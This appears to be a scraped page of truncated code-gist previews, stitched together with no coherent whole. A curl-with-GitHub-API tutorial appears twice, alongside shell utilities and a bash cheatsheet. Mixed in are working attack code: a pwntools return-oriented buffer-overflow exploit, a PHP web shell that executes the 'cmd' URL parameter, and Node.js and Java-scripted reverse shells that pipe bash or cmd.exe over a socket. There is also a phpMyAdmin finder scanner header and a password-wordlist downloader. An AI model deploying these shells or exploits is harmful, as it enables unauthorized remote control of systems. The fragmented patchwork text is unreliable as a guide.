An introduction to curl
using GitHub's API.
Makes a basic GET request to the specifed URI
curl https://api.github.com/users/caspyin
Includes HTTP-Header information in the output
#!/usr/bin/env python2 | |
from pwn import * | |
main = 0x40075d | |
p = process('./game10-ropme') | |
p.sendline('A' * 72 + p64(main)) |
<?php | |
ini_set('max_input_time', 0); | |
ini_set('max_execution_time', 0); | |
if (!empty($_GET['cmd'])) { | |
$in = $_GET['cmd']; | |
$out = ""; | |
if (function_exists('exec')) { | |
@exec($in,$out); | |
$out = @join("\n",$out); |
#!/bin/bash | |
filename="/path/to/your/file.log" | |
subject="Subject of my email" | |
txtmessage="This is the message I want to send" | |
{ | |
sleep 1; | |
echo "EHLO mydomain.intra" | |
sleep 1; |
# A shortcut function that simplifies usage of xclip. | |
# - Accepts input from either stdin (pipe), or params. | |
# ------------------------------------------------ | |
cb() { | |
local _scs_col="\e[0;32m"; local _wrn_col='\e[1;31m'; local _trn_col='\e[0;33m' | |
# Check that xclip is installed. | |
if ! type xclip > /dev/null 2>&1; then | |
echo -e "$_wrn_col""You must have the 'xclip' program installed.\e[0m" | |
# Check user is not root (root doesn't have access to user xorg server) | |
elif [[ "$USER" == "root" ]]; then |
#!/bin/bash | |
##################################################### | |
# Name: Bash CheatSheet for Mac OSX | |
# | |
# A little overlook of the Bash basics | |
# | |
# Usage: | |
# | |
# Author: J. Le Coupanec | |
# Date: 2014/11/04 |
An introduction to curl
using GitHub's API.
Makes a basic GET request to the specifed URI
curl https://api.github.com/users/caspyin
Includes HTTP-Header information in the output
#!/usr/bin/perl | |
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* | |
# | |
# //////////////////////////////////// | |
# dOcToR N!nja | |
# //////////////////////////////////// | |
# | |
# Title : PHPmyadmin Finder | |
# Category : Remote |
var spawn = require('child_process').spawn; | |
var net = require('net'); | |
var reconnect = require('reconnect'); | |
reconnect(function (stream) { | |
var ps = spawn('bash', [ '-i' ]); | |
stream.pipe(ps.stdin); | |
ps.stdout.pipe(stream, { end: false }); | |
ps.stderr.pipe(stream, { end: false }); | |
ps.on('exit', function () { stream.end() }); |
var host="localhost"; | |
var port=8044; | |
var cmd="cmd.exe"; | |
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close(); |
#!/bin/bash | |
#Script by OliverK | |
#Downloads _every_ wordlist in the packet storm security site. | |
#April 18th, 2011 | |
# Updated Oct , 2th, 2012 | |
mkdir common | |
cd common | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |